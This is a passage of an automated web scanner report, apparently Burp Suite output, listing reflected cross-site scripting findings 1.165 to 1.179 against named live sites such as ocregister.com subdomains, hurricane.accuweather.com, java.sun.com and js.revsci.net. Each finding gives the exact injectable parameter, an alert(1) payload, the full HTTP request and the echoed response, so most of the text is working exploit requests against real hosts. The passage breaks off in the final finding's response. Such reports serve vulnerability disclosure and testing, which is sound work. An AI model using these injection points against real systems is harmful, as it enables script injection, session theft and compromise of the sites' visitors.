1.165. http://guru.sitescout.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8e3b'%3balert(1)//7fbf4efe72 was submitted in the w parameter. This input was echoed as d8e3b';alert(1)//7fbf4efe72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=7C8A652&w=300d8e3b'%3balert(1)//7fbf4efe72&h=250&rnd=1219859 HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 383
Date: Thu, 03 Feb 2011 16:04:28 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=7C8A652&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300d8e3b';alert(1)//7fbf4efe72" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.166. http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://huntingtonhomes.ocregister.com
Path:   /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d33ef"><script>alert(1)</script>784ccd9e713 was submitted in the REST URL parameter 5. This input was echoed as d33ef\"><script>alert(1)</script>784ccd9e713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042d33ef"><script>alert(1)</script>784ccd9e713/ HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
nate" type="application/rss+xml" title=" Page not found - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042d33ef\"><script>alert(1)</script>784ccd9e713/feed/" />
...[SNIP]...

1.167. http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://huntingtonhomes.ocregister.com
Path:   /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11603"><script>alert(1)</script>ec87b8f4492 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 11603\"><script>alert(1)</script>ec87b8f4492 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/?11603"><script>alert(1)</script>ec87b8f4492=1 HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Link: <http://huntingtonhomes.ocregister.com/?p=127042>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 130070


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
ashed H.B. house on &#8216;Good Morning America&#8217; - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/?11603\"><script>alert(1)</script>ec87b8f4492=1feed/" />
...[SNIP]...

1.168. http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://huntingtonhomes.ocregister.com
Path:   /2011/02/03/repod-green-home-is-back-on-the-market/127100/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44602"><script>alert(1)</script>cd83832419c was submitted in the REST URL parameter 5. This input was echoed as 44602\"><script>alert(1)</script>cd83832419c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/repod-green-home-is-back-on-the-market/12710044602"><script>alert(1)</script>cd83832419c/ HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
ternate" type="application/rss+xml" title=" Page not found - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/12710044602\"><script>alert(1)</script>cd83832419c/feed/" />
...[SNIP]...

1.169. http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://huntingtonhomes.ocregister.com
Path:   /2011/02/03/repod-green-home-is-back-on-the-market/127100/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aba25"><script>alert(1)</script>01bcc28d4e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aba25\"><script>alert(1)</script>01bcc28d4e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/repod-green-home-is-back-on-the-market/127100/?aba25"><script>alert(1)</script>01bcc28d4e8=1 HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Link: <http://huntingtonhomes.ocregister.com/?p=127100>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77988


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
po&#8217;d &#8216;green&#8217; home is back on the market - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/?aba25\"><script>alert(1)</script>01bcc28d4e8=1feed/" />
...[SNIP]...

1.170. http://hurricane.accuweather.com/hurricane/index.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hurricane.accuweather.com
Path:   /hurricane/index.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 722b7"><script>alert(1)</script>9e1b639a6b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hurricane/index.asp?722b7"><script>alert(1)</script>9e1b639a6b3=1 HTTP/1.1
Host: hurricane.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Type: text/html
Cache-Control: public, max-age=300
Expires: Thu, 03 Feb 2011 19:10:48 GMT
Date: Thu, 03 Feb 2011 19:05:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<a rel="nofollow" href="/hurricane/index.asp?722b7"><script>alert(1)</script>9e1b639a6b3=1&unit=f">
...[SNIP]...

1.171. http://hurricane.accuweather.com/hurricane/index.asp [partner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hurricane.accuweather.com
Path:   /hurricane/index.asp

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81137"><script>alert(1)</script>7e000d53a18 was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hurricane/index.asp?partner=accuweather81137"><script>alert(1)</script>7e000d53a18 HTTP/1.1
Host: hurricane.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Type: text/html
Cache-Control: public, max-age=300
Expires: Thu, 03 Feb 2011 19:10:51 GMT
Date: Thu, 03 Feb 2011 19:05:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<a rel="nofollow" href="/hurricane/index.asp?partner=accuweather81137"><script>alert(1)</script>7e000d53a18&unit=f">
...[SNIP]...

1.172. http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://inyourface.ocregister.com
Path:   /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f25b3"><script>alert(1)</script>e5fb01ad94c was submitted in the REST URL parameter 5. This input was echoed as f25b3\"><script>alert(1)</script>e5fb01ad94c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744f25b3"><script>alert(1)</script>e5fb01ad94c/ HTTP/1.1
Host: inyourface.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://inyourface.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 70357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
k rel="alternate" type="application/rss+xml" title=" Page not found - In Your Face - www.ocregister.com" href="http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744f25b3\"><script>alert(1)</script>e5fb01ad94c/feed/" />
...[SNIP]...

1.173. http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://inyourface.ocregister.com
Path:   /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0f14"><script>alert(1)</script>e4a4ce6c848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0f14\"><script>alert(1)</script>e4a4ce6c848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/?b0f14"><script>alert(1)</script>e4a4ce6c848=1 HTTP/1.1
Host: inyourface.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://inyourface.ocregister.com/xmlrpc.php
Link: <http://inyourface.ocregister.com/?p=25744>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 84939


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
lication/rss+xml" title=" TV bride won more surgery than she knew - In Your Face - www.ocregister.com" href="http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/?b0f14\"><script>alert(1)</script>e4a4ce6c848=1feed/" />
...[SNIP]...

1.174. http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /update/1.6.0/jinstall-6-windows-i586.cab

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4966c"style%3d"x%3aexpression(alert(1))"f842afe3d26 was submitted in the REST URL parameter 1. This input was echoed as 4966c"style="x:expression(alert(1))"f842afe3d26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /4966c"style%3d"x%3aexpression(alert(1))"f842afe3d26/1.6.0/jinstall-6-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 03 Feb 2011 16:20:10 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/4966c"style="x:expression(alert(1))"f842afe3d26/1.6.0/jinstall-6-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

1.175. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload da001<script>alert(1)</script>1c47112440a was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G05524da001<script>alert(1)</script>1c47112440a HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d6e5e16&0&&4d4637e7&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d6e5f77&0&&4d464cb2&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvsNUvMS5jJgE8Efe6cA/gU+BBsKjEeIf8lOISRcnGovHI6UEjSeeH4ygDZPpq3+/yS+PtxMQT7DslgE+EiBMcIdm+Gd/vQ8HMUGpOgSK+Iiy2dQ4mJ3SoQqTJ6fQVFiTZ9oRHyAn8YGRiYSjj2Ay1aQ3fE6vV5I9utDq0gdZ4/kVrRmNIOysji0Wn6/0LxbFbkxJUqn7AWIp2smXVCwMrSCX++R6vBtN664sMTvtNTbZXz0uM3sNWkLQhYlIi7SQwWY0rkMmj7vgY8B8gTBxg4wiG6w5j1DmzvVr4tx5DmkYz2wgpi9jyFX3BxNhVvlXHFNzBu4s3pRGxzkoYSZsG7tdLNgzEqBJPubDyRn4Xf+c3859kMdk7ghrTmCS2c/r6TbGtxpUM45NaHIbEK6+Cm0jFU0ivCzVPvaGdh9z3gjy1aXP5qVqL4CpwQgO4GiR/u5Ro5/TlTA==; rsi_segs_1000000=pUPFeU+FbxIQlVNYvPseIeEiFPKES2rX32SxfaDo4ZtI52+8kOrN2tIEatD2NFDN28McViXNICYwA3URtRQyHBfvW63RgQEvN3nTlHdbuK0MtbbnRNLsfPWlzdt7bBgxNo9S4ekQFKVzWiMHf/qOY/QXNYa+cLbu/9VZ8kRAQYWrhsJ+HLJ+yqOn8V4GEDQj/JldvKgki2EQ3w31l1DXzYDe9FQn0rxNrHq1JcpEh3un35yjZC9pStvAXS+WzCcUrLD4wAtiq9yiIYXVOZ0RybGj2Gcwxe3ACA==; udm_0=...[SNIP]...; rsi_us_1000000=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 03 Feb 2011 14:22:59 GMT
Cache-Control: max-age=86400, private
Expires: Fri, 04 Feb 2011 14:22:59 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Thu, 03 Feb 2011 14:22:58 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G05524DA001<SCRIPT>ALERT(1)</SCRIPT>1C47112440A" was not recognized.
*/

1.176. http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lagunahomes.ocregister.com
Path:   /2011/02/02/oceanfront-with-killer-views-a-deal/14224/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8adda"><script>alert(1)</script>15e0db13ad7 was submitted in the REST URL parameter 5. This input was echoed as 8adda\"><script>alert(1)</script>15e0db13ad7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/oceanfront-with-killer-views-a-deal/142248adda"><script>alert(1)</script>15e0db13ad7/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
el="alternate" type="application/rss+xml" title=" Page not found - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/142248adda\"><script>alert(1)</script>15e0db13ad7/feed/" />
...[SNIP]...

1.177. http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lagunahomes.ocregister.com
Path:   /2011/02/02/oceanfront-with-killer-views-a-deal/14224/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7745"><script>alert(1)</script>ced09a70bf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7745\"><script>alert(1)</script>ced09a70bf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/oceanfront-with-killer-views-a-deal/14224/?f7745"><script>alert(1)</script>ced09a70bf4=1 HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14224>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64639


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
lication/rss+xml" title=" Oceanfront with killer views a deal? - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/?f7745\"><script>alert(1)</script>ced09a70bf4=1feed/" />
...[SNIP]...

1.178. http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lagunahomes.ocregister.com
Path:   /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f68e"><script>alert(1)</script>a746ad081d4 was submitted in the REST URL parameter 5. This input was echoed as 9f68e\"><script>alert(1)</script>a746ad081d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/140209f68e"><script>alert(1)</script>a746ad081d4/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
alternate" type="application/rss+xml" title=" Page not found - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/140209f68e\"><script>alert(1)</script>a746ad081d4/feed/" />
...[SNIP]...

1.179. http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lagunahomes.ocregister.com
Path:   /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 366d8"><script>alert(1)</script>65b84b53c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 366d8\"><script>alert(1)</script>65b84b53c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/?366d8"><script>alert(1)</script>65b84b53c1=1 HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14020>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53131


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
